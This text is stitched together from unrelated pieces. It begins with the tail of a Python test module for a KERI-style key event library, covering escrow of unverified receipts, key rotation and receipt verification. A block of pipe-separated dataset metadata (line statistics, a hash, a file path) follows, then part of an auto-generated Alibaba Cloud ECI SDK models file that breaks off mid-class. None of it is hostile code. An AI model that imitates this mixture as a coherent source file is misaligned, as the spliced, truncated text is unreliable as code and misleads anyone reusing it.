        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        rotmsg = msg

        # create receipt(s) of rotation message
        reserder = eventing.receipt(pre=pre, sn=2, dig=srdr.dig)
        # sign event not receipt with wit0
        wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0]  # returns Cigar unindexed
        wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0]  # returns Cigar unindexed
        recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)

        msg = bytearray()
        msg.extend(reserder.raw)
        msg.extend(recnt.qb64b)
        msg.extend(wit0pre.encode("utf-8"))
        msg.extend(wit0Cigar.qb64b)
        msg.extend(wit1pre.encode("utf-8"))
        msg.extend(wit1Cigar.qb64b)

        rctrotmsg = msg

        # Process receipt by kvy; escrow at sn=2
        psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctrotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        escrows = kvy.db.getUres(dbing.snKey(pre, 2))  # so escrowed receipts
        assert len(escrows) == 2
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit0pre
        assert cigar.qb64 == wit0Cigar.qb64
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit1pre
        assert cigar.qb64 == wit1Cigar.qb64

        # Process out of unverified but stale escrow set Timeout to 0
        kvy.TimeoutURE = 0  # forces all escrows to be stale
        time.sleep(0.001)  # ensure escrow datetimes are strictly in the past
        kvy.processEscrowUnverNonTrans()
        assert pre not in kvy.kevers  # key state not updated

        # check escrows removed
        assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 0
        assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 0
        assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 0

        # Now reset timeout so not zero and resend receipts to reload escrow
        kvy.TimeoutURE = 3600

        # Process receipt by kvy
        psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rcticpmsg))  # process local copy of msg
        psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctixnmsg))  # process local copy of msg
        psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctrotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre

        # assert Ure escrows are back
        assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 2
        assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 2
        assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 2

        # apply inception msg to Kevery to process
        psr.parse(ims=bytearray(icpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(icpmsg))  # process local copy of msg
        assert pre in kvy.kevers  # event accepted
        kvr = kvy.kevers[pre]
        assert kvr.serder.dig == icpdig  # key state updated so event was validated
        assert kvr.sn == 0  # key state successfully updated

        # apply ixn msg to Kevery to process
        psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ixnmsg))  # process local copy of msg
        assert kvr.serder.dig == ixndig  # key state updated so event was validated
        assert kvr.sn == 1  # key state successfully updated

        # apply rotation msg to Kevery to process
        psr.parse(ims=bytearray(rotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rotmsg))  # process local copy of msg
        assert kvr.serder.dig == rotdig  # key state updated so event was validated
        assert kvr.sn == 2  # key state successfully updated

        # assert Ure escrows have not changed (receipts only verified on escrow run)
        assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 2
        assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 2
        assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 2

        # verify Kevery process unverified receipt escrow i
        # assuming not stale but nothing else has changed
        kvy.processEscrowUnverNonTrans()

        # check escrows removed
        assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 0
        assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 0
        assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 0

        # verify receipts promoted to verified receipt couple database
        receipts = kvy.db.getRcts(dbing.dgKey(pre, icpdig))
        assert len(receipts) == 2
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
        assert rctPrefixer.qb64 == wit0pre
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
        assert rctPrefixer.qb64 == wit1pre

        receipts = kvy.db.getRcts(dbing.dgKey(pre, ixndig))
        assert len(receipts) == 2
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
        assert rctPrefixer.qb64 == wit0pre
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
        assert rctPrefixer.qb64 == wit1pre

        receipts = kvy.db.getRcts(dbing.dgKey(pre, rotdig))
        assert len(receipts) == 2
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
        assert rctPrefixer.qb64 == wit0pre
        rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
        assert rctPrefixer.qb64 == wit1pre

    # context managers clean up the temp databases on exit
    assert not os.path.exists(ks.path)
    assert not os.path.exists(db.path)
    """End Test"""
def test_unverified_trans_receipt_escrow():
    """
    Test Kevery escrow of unverified transferable (validator) receipts.

    Scenario exercised below:
      1. Transferable receipts (event seal quadruples from a receipter
         identifier) arrive before both the receipted events and the
         receipter's own key events, so they land in the Vre escrow.
      2. TimeoutVRE = 0 makes them stale so processEscrowUnverTrans()
         purges them.
      3. After reload, delivering the receipted events alone is NOT enough:
         escrows only clear once the receipter's own icp/rot events are
         accepted, establishing the key state needed to verify each
         receipt's signatures. Verified receipts move to the Vrcs database.
    """
    salt = coring.Salter(raw=b'0123456789abcdef').qb64  # init Salter
    psr = parsing.Parser()

    # init event DB and keep DB
    with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
        # Init key pair manager
        mgr = keeping.Manager(keeper=ks, salt=salt)
        # Init Kevery with event DB
        kvy = eventing.Kevery(db=db)

        # create inception event with 3 keys each in incept and next sets
        # defaults are algo salty and rooted
        sith = ["1/2", "1/2", "1/2"]  # 2 of 3 but with weighted threshold
        nxtsith = ["1/2", "1/2", "1/2"]
        verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
                                               ncount=3, nsith=nxtsith,
                                               stem='edy', temp=True)
        assert cst == nst == sith

        srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               code=coring.MtrDex.Blake3_256)

        pre = srdr.ked["i"]
        icpdig = srdr.dig

        mgr.move(old=verfers[0].qb64, new=pre)  # move key pair label to prefix

        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        icpmsg = msg

        # create receipter (validator) inception keys 2 of 3
        rverfers, rdigers, cst, nst = mgr.incept(icount=3, ncount=3, stem='ray', temp=True)
        rsith = '2'

        # create recepter's inception event
        rsrdr = eventing.incept(keys=[verfer.qb64 for verfer in rverfers],
                                sith=rsith,
                                nxt=coring.Nexter(sith=rsith,
                                                  digs=[diger.qb64 for diger in rdigers]).qb64,
                                code=coring.MtrDex.Blake3_256)

        rpre = rsrdr.ked["i"]
        ricpdig = rsrdr.dig

        mgr.move(old=rverfers[0].qb64, new=rpre)  # move receipter key pair label to prefix

        rsigers = mgr.sign(ser=rsrdr.raw, verfers=rverfers)

        msg = bytearray(rsrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(rsigers))
        msg.extend(counter.qb64b)
        for siger in rsigers:
            msg.extend(siger.qb64b)

        ricpmsg = msg

        # create transferable receipt of inception message
        seal = eventing.SealEvent(i=rpre,
                                  s=rsrdr.ked["s"],
                                  d=rsrdr.dig)
        reserder = eventing.receipt(pre=pre, sn=0, dig=icpdig)
        # sign event not receipt
        resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
        rcticpmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)

        # Process receipt by kvy before either identifier has events -> Vre escrow
        psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rcticpmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre (receipted)
        assert rpre not in kvy.kevers  # no events yet for rpre (receipter)
        escrows = kvy.db.getVres(dbing.snKey(pre, 0))  # so escrowed receipts
        assert len(escrows) == 3
        diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert sprefixer.qb64 == rpre
        assert sseqner.sn == 0
        assert sdiger.qb64 == rsrdr.dig
        assert siger.qb64 == resigers[0].qb64

        # create interaction event
        srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
        ixndig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        ixnmsg = msg

        # Create rotation event of receipter
        # get current keys as verfers and next digests as digers
        rverfers, rdigers, cst, nst = mgr.rotate(pre=rpre, count=3, temp=True)
        rsrdr = eventing.rotate(pre=rpre,
                                keys=[verfer.qb64 for verfer in rverfers],
                                sith=rsith,
                                dig=ricpdig,
                                nxt=coring.Nexter(sith=rsith,
                                                  digs=[diger.qb64 for diger in rdigers]).qb64,
                                sn=1,
                                data=[])
        rrotdig = rsrdr.dig
        rsigers = mgr.sign(ser=rsrdr.raw, verfers=rverfers)

        msg = bytearray(rsrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(rsigers))
        msg.extend(counter.qb64b)
        for siger in rsigers:
            msg.extend(siger.qb64b)

        rrotmsg = msg

        # create receipt(s) of interaction message with receipter rotation message
        # create chit receipt(s) of interaction message
        seal = eventing.SealEvent(i=rpre,
                                  s=rsrdr.ked["s"],
                                  d=rsrdr.dig)
        reserder = eventing.receipt(pre=pre, sn=1, dig=ixndig)
        # sign event not receipt
        resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
        rctixnmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)

        # Process receipt by kvy; escrow at sn=1
        psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctixnmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        assert rpre not in kvy.kevers  # no events yet for rpre (receipter)
        escrows = kvy.db.getVres(dbing.snKey(pre, 1))  # so escrowed receipts
        assert len(escrows) == 3
        diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert sprefixer.qb64 == rpre
        assert sseqner.sn == 1
        assert sdiger.qb64 == rsrdr.dig
        assert siger.qb64 == resigers[0].qb64

        # Create rotation event or receipted
        # get current keys as verfers and next digests as digers
        sith = nxtsith  # rotate so nxtsith is now current sith and need new nextsith
        # 2 of first 3 and 1 of last 2
        nxtsith = [["1/2", "1/2", "1/2"], ["1/1", "1/1"]]
        verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
        assert cst == sith
        assert nst == nxtsith

        srdr = eventing.rotate(pre=pre,
                               keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               dig=ixndig,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               sn=2,
                               data=[])
        rotdig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        rotmsg = msg

        # create receipt(s) of rotation message with rotation message of receipter
        # create chit receipt(s) of interaction message
        seal = eventing.SealEvent(i=rpre,
                                  s= rsrdr.ked["s"],
                                  d=rsrdr.dig)
        reserder = eventing.receipt(pre=pre, sn=2, dig=rotdig)
        # sign event not receipt
        resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
        rctrotmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)

        # Process receipt by kvy; escrow at sn=2
        psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctrotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        assert rpre not in kvy.kevers  # no events yet for rpre (receipter)
        escrows = kvy.db.getVres(dbing.snKey(pre, 2))  # so escrowed receipts
        assert len(escrows) == 3
        diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert sprefixer.qb64 == rpre
        assert sseqner.sn == 1
        assert sdiger.qb64 == rsrdr.dig
        assert siger.qb64 == resigers[0].qb64

        # Process out of unverified but stale escrow set Timeout to 0
        kvy.TimeoutVRE = 0  # forces all escrows to be stale
        time.sleep(0.001)  # ensure escrow datetimes are strictly in the past
        kvy.processEscrowUnverTrans()
        assert pre not in kvy.kevers  # key state not updated
        assert rpre not in kvy.kevers  # key state not updated for receipter

        # check escrows removed
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 0
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 0

        # Now reset timeout so not zero and resend receipts to reload escrow
        kvy.TimeoutVRE = 3600

        # Process receipt by kvy
        psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rcticpmsg))  # process local copy of msg
        psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctixnmsg))  # process local copy of msg
        psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctrotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        assert rpre not in kvy.kevers  # no events yet for rpre (receipter)

        # check escrows are back
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3

        # apply inception msg to Kevery to process
        psr.parse(ims=bytearray(icpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(icpmsg))  # process local copy of msg
        assert pre in kvy.kevers  # event accepted
        kvr = kvy.kevers[pre]
        assert kvr.serder.dig == icpdig  # key state updated so event was validated
        assert kvr.sn == 0  # key state successfully updated

        # apply ixn msg to Kevery to process
        psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ixnmsg))  # process local copy of msg
        assert kvr.serder.dig == ixndig  # key state updated so event was validated
        assert kvr.sn == 1  # key state successfully updated

        # apply rotation msg to Kevery to process
        psr.parse(ims=bytearray(rotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rotmsg))  # process local copy of msg
        assert kvr.serder.dig == rotdig  # key state updated so event was validated
        assert kvr.sn == 2  # key state successfully updated

        # check escrows have not changed
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3

        # verify Kevery process unverified trans receipt escrow
        kvy.processEscrowUnverTrans()

        # check escrows have not changed because no receipter events
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3

        # apply inception msg of receipter to Kevery to process
        psr.parse(ims=bytearray(ricpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ricpmsg))  # process local copy of msg
        assert rpre in kvy.kevers  # rpre (receipter) accepted
        rkvr = kvy.kevers[rpre]
        assert rkvr.serder.dig == ricpdig  # key state updated so event was validated
        assert rkvr.sn == 0  # key state successfully updated

        # verify Kevery process unverified trans receipt escrow
        kvy.processEscrowUnverTrans()

        # check escrows have changed for receipts by receipter inception
        # (only the sn=0 receipt was sealed to the receipter's icp event)
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3

        # apply rotation msg of receipter to Kevery to process
        psr.parse(ims=bytearray(rrotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rrotmsg))  # process local copy of msg
        assert rkvr.serder.dig == rrotdig  # key state updated so event was validated
        assert rkvr.sn == 1  # key state successfully updated

        # verify Kevery process unverified trans receipt escrow
        kvy.processEscrowUnverTrans()

        # check escrows have changed for receipts by receipter inception
        assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
        assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 0
        assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 0

        # verify receipts promoted to verified trans receipt database
        receipts = kvy.db.getVrcs(dbing.dgKey(pre, icpdig))
        assert len(receipts) == 3
        rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
        assert rctPrefixer.qb64 == rpre
        assert rctSeqner.sn == 0
        assert rctDiger.qb64 == ricpdig

        receipts = kvy.db.getVrcs(dbing.dgKey(pre, ixndig))
        assert len(receipts) == 3
        rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
        assert rctPrefixer.qb64 == rpre
        assert rctSeqner.sn == 1
        assert rctDiger.qb64 == rrotdig

        receipts = kvy.db.getVrcs(dbing.dgKey(pre, rotdig))
        assert len(receipts) == 3
        rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
        assert rctPrefixer.qb64 == rpre
        assert rctSeqner.sn == 1
        assert rctDiger.qb64 == rrotdig

    # context managers clean up the temp databases on exit
    assert not os.path.exists(ks.path)
    assert not os.path.exists(db.path)
    """End Test"""
if __name__ == "__main__":
    # Manual-run entry point: previously only the first escrow test ran,
    # silently skipping the other escrow tests defined in this module.
    test_out_of_order_escrow()
    test_unverified_receipt_escrow()
    test_unverified_trans_receipt_escrow()
| 43.283019
| 109
| 0.596096
| 7,740
| 61,938
| 4.765375
| 0.052067
| 0.031884
| 0.022205
| 0.02657
| 0.906599
| 0.890196
| 0.873251
| 0.857418
| 0.850531
| 0.837843
| 0
| 0.024822
| 0.302722
| 61,938
| 1,430
| 110
| 43.313287
| 0.829212
| 0.234493
| 0
| 0.843478
| 0
| 0
| 0.009182
| 0
| 0
| 0
| 0
| 0
| 0.296739
| 1
| 0.005435
| false
| 0
| 0.009783
| 0
| 0.015217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c51c29688243f35154936b4f80e55c6e63eb8550
| 373,938
|
py
|
Python
|
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
class DescribeRegionsRequest(TeaModel):
    """Request model for the ECI DescribeRegions API."""

    def __init__(self, region_id=None):
        # RegionId filter; None queries all regions (server-side default).
        self.region_id = region_id

    def validate(self):
        """No required fields for this request."""
        pass

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['RegionId'] = self.region_id
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self.

        The parameter keeps its generated name ``map`` (it shadows the
        builtin) for keyword-caller compatibility; the mutable ``{}``
        default was replaced with ``None`` to avoid a shared default object.
        """
        map = map if map is not None else {}
        self.region_id = map.get('RegionId')
        return self
class DescribeRegionsResponse(TeaModel):
    """Response model for the ECI DescribeRegions API."""

    def __init__(self, request_id=None, regions=None):
        self.request_id = request_id
        # Fix: the generated code discarded the ``regions`` argument and
        # always assigned []; honor it while keeping [] as the default.
        self.regions = regions if regions is not None else []

    def validate(self):
        """Check required fields and recursively validate region items."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.regions, 'regions')
        if self.regions:
            for k in self.regions:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize this model (and nested regions) to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        result['Regions'] = []
        if self.regions is not None:
            for k in self.regions:
                result['Regions'].append(k.to_map() if k else None)
        else:
            result['Regions'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self."""
        map = map if map is not None else {}  # avoid mutable default
        self.request_id = map.get('RequestId')
        self.regions = []
        if map.get('Regions') is not None:
            for k in map.get('Regions'):
                temp_model = DescribeRegionsResponseRegions()
                self.regions.append(temp_model.from_map(k))
        else:
            self.regions = None
        return self
class DescribeRegionsResponseRegions(TeaModel):
    """A single region entry within DescribeRegionsResponse."""

    def __init__(self, region_id=None, region_endpoint=None, zones=None):
        self.region_id = region_id
        self.region_endpoint = region_endpoint
        # Fix: the generated code discarded the ``zones`` argument and
        # always assigned []; honor it while keeping [] as the default.
        self.zones = zones if zones is not None else []

    def validate(self):
        """Check required fields; zone entries are plain strings."""
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.region_endpoint, 'region_endpoint')
        self.validate_required(self.zones, 'zones')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['RegionId'] = self.region_id
        result['RegionEndpoint'] = self.region_endpoint
        result['Zones'] = []
        if self.zones is not None:
            for k in self.zones:
                result['Zones'].append(k)
        else:
            result['Zones'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self."""
        map = map if map is not None else {}  # avoid mutable default
        self.region_id = map.get('RegionId')
        self.region_endpoint = map.get('RegionEndpoint')
        self.zones = []
        if map.get('Zones') is not None:
            for k in map.get('Zones'):
                self.zones.append(k)
        else:
            self.zones = None
        return self
class DescribeImageCachesRequest(TeaModel):
    """Request model for the ECI DescribeImageCaches API."""

    def __init__(self, region_id=None, image_cache_id=None, image_cache_name=None, snapshot_id=None, image=None):
        self.region_id = region_id
        self.image_cache_id = image_cache_id
        self.image_cache_name = image_cache_name
        self.snapshot_id = snapshot_id
        self.image = image

    def validate(self):
        """Only RegionId is required; the other fields are filters."""
        self.validate_required(self.region_id, 'region_id')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['RegionId'] = self.region_id
        result['ImageCacheId'] = self.image_cache_id
        result['ImageCacheName'] = self.image_cache_name
        result['SnapshotId'] = self.snapshot_id
        result['Image'] = self.image
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self.

        ``map`` keeps its generated name for keyword-caller compatibility;
        the mutable ``{}`` default was replaced with ``None``.
        """
        map = map if map is not None else {}
        self.region_id = map.get('RegionId')
        self.image_cache_id = map.get('ImageCacheId')
        self.image_cache_name = map.get('ImageCacheName')
        self.snapshot_id = map.get('SnapshotId')
        self.image = map.get('Image')
        return self
class DescribeImageCachesResponse(TeaModel):
    """Response model for the ECI DescribeImageCaches API."""

    def __init__(self, request_id=None, image_caches=None):
        self.request_id = request_id
        # Fix: the generated code discarded the ``image_caches`` argument
        # and always assigned []; honor it while keeping [] as the default.
        self.image_caches = image_caches if image_caches is not None else []

    def validate(self):
        """Check required fields and recursively validate cache items."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.image_caches, 'image_caches')
        if self.image_caches:
            for k in self.image_caches:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize this model (and nested caches) to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        result['ImageCaches'] = []
        if self.image_caches is not None:
            for k in self.image_caches:
                result['ImageCaches'].append(k.to_map() if k else None)
        else:
            result['ImageCaches'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self."""
        map = map if map is not None else {}  # avoid mutable default
        self.request_id = map.get('RequestId')
        self.image_caches = []
        if map.get('ImageCaches') is not None:
            for k in map.get('ImageCaches'):
                temp_model = DescribeImageCachesResponseImageCaches()
                self.image_caches.append(temp_model.from_map(k))
        else:
            self.image_caches = None
        return self
class DescribeImageCachesResponseImageCachesEvents(TeaModel):
    """An event record attached to an image cache in DescribeImageCaches."""

    def __init__(self, count=None, type=None, name=None, message=None, first_timestamp=None, last_timestamp=None):
        # NOTE: ``type`` shadows the builtin but must keep its generated
        # name for keyword-caller compatibility.
        self.count = count
        self.type = type
        self.name = name
        self.message = message
        self.first_timestamp = first_timestamp
        self.last_timestamp = last_timestamp

    def validate(self):
        """All fields are required on this response sub-model."""
        self.validate_required(self.count, 'count')
        self.validate_required(self.type, 'type')
        self.validate_required(self.name, 'name')
        self.validate_required(self.message, 'message')
        self.validate_required(self.first_timestamp, 'first_timestamp')
        self.validate_required(self.last_timestamp, 'last_timestamp')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['Count'] = self.count
        result['Type'] = self.type
        result['Name'] = self.name
        result['Message'] = self.message
        result['FirstTimestamp'] = self.first_timestamp
        result['LastTimestamp'] = self.last_timestamp
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self.

        Mutable ``{}`` default replaced with ``None`` (shared-default pitfall).
        """
        map = map if map is not None else {}
        self.count = map.get('Count')
        self.type = map.get('Type')
        self.name = map.get('Name')
        self.message = map.get('Message')
        self.first_timestamp = map.get('FirstTimestamp')
        self.last_timestamp = map.get('LastTimestamp')
        return self
class DescribeImageCachesResponseImageCaches(TeaModel):
    """A single image-cache record within DescribeImageCachesResponse."""

    def __init__(self, container_group_id=None, image_cache_id=None, image_cache_name=None, snapshot_id=None, progress=None, status=None, expire_date_time=None, creation_time=None, region_id=None, events=None, images=None):
        self.container_group_id = container_group_id
        self.image_cache_id = image_cache_id
        self.image_cache_name = image_cache_name
        self.snapshot_id = snapshot_id
        self.progress = progress
        self.status = status
        self.expire_date_time = expire_date_time
        self.creation_time = creation_time
        self.region_id = region_id
        # Fix: the generated code discarded the ``events`` and ``images``
        # arguments and always assigned []; honor them with [] defaults.
        self.events = events if events is not None else []
        self.images = images if images is not None else []

    def validate(self):
        """Check required fields and recursively validate event items."""
        self.validate_required(self.container_group_id, 'container_group_id')
        self.validate_required(self.image_cache_id, 'image_cache_id')
        self.validate_required(self.image_cache_name, 'image_cache_name')
        self.validate_required(self.snapshot_id, 'snapshot_id')
        self.validate_required(self.progress, 'progress')
        self.validate_required(self.status, 'status')
        self.validate_required(self.expire_date_time, 'expire_date_time')
        self.validate_required(self.creation_time, 'creation_time')
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.events, 'events')
        if self.events:
            for k in self.events:
                if k:
                    k.validate()
        self.validate_required(self.images, 'images')

    def to_map(self):
        """Serialize this model (and nested events/images) to a dict."""
        result = {}
        result['ContainerGroupId'] = self.container_group_id
        result['ImageCacheId'] = self.image_cache_id
        result['ImageCacheName'] = self.image_cache_name
        result['SnapshotId'] = self.snapshot_id
        result['Progress'] = self.progress
        result['Status'] = self.status
        result['ExpireDateTime'] = self.expire_date_time
        result['CreationTime'] = self.creation_time
        result['RegionId'] = self.region_id
        result['Events'] = []
        if self.events is not None:
            for k in self.events:
                result['Events'].append(k.to_map() if k else None)
        else:
            result['Events'] = None
        result['Images'] = []
        if self.images is not None:
            for k in self.images:
                result['Images'].append(k)
        else:
            result['Images'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict and return self."""
        map = map if map is not None else {}  # avoid mutable default
        self.container_group_id = map.get('ContainerGroupId')
        self.image_cache_id = map.get('ImageCacheId')
        self.image_cache_name = map.get('ImageCacheName')
        self.snapshot_id = map.get('SnapshotId')
        self.progress = map.get('Progress')
        self.status = map.get('Status')
        self.expire_date_time = map.get('ExpireDateTime')
        self.creation_time = map.get('CreationTime')
        self.region_id = map.get('RegionId')
        self.events = []
        if map.get('Events') is not None:
            for k in map.get('Events'):
                temp_model = DescribeImageCachesResponseImageCachesEvents()
                self.events.append(temp_model.from_map(k))
        else:
            self.events = None
        self.images = []
        if map.get('Images') is not None:
            for k in map.get('Images'):
                self.images.append(k)
        else:
            self.images = None
        return self
class DeleteImageCacheRequest(TeaModel):
    """Request model for the ECI DeleteImageCache API."""

    def __init__(self, region_id=None, image_cache_id=None, client_token=None):
        self.region_id = region_id
        self.image_cache_id = image_cache_id
        # Idempotency token; optional.
        self.client_token = client_token

    def validate(self):
        """RegionId and ImageCacheId are required."""
        self.validate_required(self.region_id, 'region_id')
